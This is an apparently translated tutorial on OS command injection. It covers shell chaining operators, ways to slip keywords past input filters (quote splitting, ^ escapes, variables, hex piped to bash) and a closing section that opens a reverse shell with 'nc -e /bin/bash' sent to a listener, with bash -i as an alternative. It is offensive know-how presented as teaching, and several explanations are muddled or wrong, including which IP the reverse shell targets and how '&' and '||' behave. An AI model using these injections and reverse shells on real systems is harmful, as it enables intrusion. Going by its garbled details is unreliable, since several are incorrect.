Remote Code/Command Execution Vulnerability is referred to as RCE and its full name is remote command/code execute.
Remote Command Execution Vulnerability
1. understand
Command injection into the operating system, referred to as command implantation, is a type of injection vulnerability. In the software, due to business needs, some command execution operations, such as ping operations, will be performed. As a result, there is a probability of remote command execution vulnerabilities. Attackers can add additional malicious instruction operations to the original command execution instruction operations of the operating system. That is, implanting malicious instructions on the shell.
In the windows operating system, the command execution is cmd. In the Linux operating system, the command execution is console.
2. Detailed explanation
Cause analysis :
Some special functions of the application program need the command function of the system to execute. If there are no or very limited input restrictions on command functions during the software development process, then malicious injection into the operating system can be achieved by controlling the input content, forming a loophole.
Initial attempt :
It is generally checked by entering specific command keywords or special symbols.
Attack execution means of remote commands :
- cmd1;cmd2
(When there is no input restriction on command keywords or special symbols)
Separate the two command instructions with a semicolon.
Under the Linux operating system, the second command will be executed after the first command is executed. In the Windows operating system, the semicolon function is invalid.
From this, it can be concluded what the operating system of the target that needs to be attacked is.
- cmd1&cmd2
& is a background operator, it will execute command 1 first, and then put command 1 into the background, regardless of whether command 1 is executed or not, command 2 will be executed.
That is to say, after using &, command 1 can be input casually, because command 2 will be executed, as long as command 2 is the required command.
- cmd1||cmd2
|| is an OR operator, first execute command 1 and then execute command 2.
If 1 succeeds, 2 is not executed. If 1 fails, do 2.
- cmd1|cmd2
| The result of the previous command is used as the parameter of the next command.
- cmd1&&cmd2
&& is an AND operator, first execute 1 and then execute 2, but only execute 2 if 1 succeeds.
Operators just combine our commands to create malicious effects, and the core content is the command itself.
Remote command vulnerability prevention:
Filter key characters for prevention
Prevent and process by restricting the content entered by the user and not running the key content.
Bypass of filtering rules :
There are common workarounds for systems with limited input.
1. Add quotation marks
For example: the whoami command will get the name of the system administrator but is restricted from entering
You can add quotation marks to who"am"i to bypass the restriction input
2. Add ^ symbol
^ is an escape character, which converts the character into the original character, which can destroy the form of the keyword.
For example: the echo command is restricted, you can use e^cho, after escaping, it is still echo, but
It will limit the input to only detect four characters of echo, echo!=e^cho, because e^cho will be regarded as five characters, so the restriction input can be bypassed.
3. Set variables
Enter set a=whoami, (= no spaces on both sides), change a to whoami
Then enter cmd /c %a% to get the administrator name
4. Use semicolons instead of spaces
But semicolons instead of spaces can only be used under windows system. In the Linux system, a semicolon is used to separate two command instructions. Linux generally uses single quotes '' or slashes \ to bypass.
5. Text to hexadecimal
The command instruction can be converted into hexadecimal instead of execution.
For example, convert echo aaa to hexadecimal
On the Linux command line, you can enter echo hexadecimal numbers/xxd -r -p|bash
It can be converted into the original command instruction, and the filter can be bypassed.
After the attack can be performed, about the penetration :
1. Connect the target computer with the port number of your own computer
In the Linux system, listen to a port number in your own command line window
nc -lvnp 8081 listen on 8081
Enter where command-line injection is possible
cmd1&nc -e /bin/bash target IP address 8081
You can query the target computer in the command line window of your computer
For example: Entering whoami will display the administrator name of the target computer
But in docker (another Linux server), you can't use nc -e, you can use bash -i command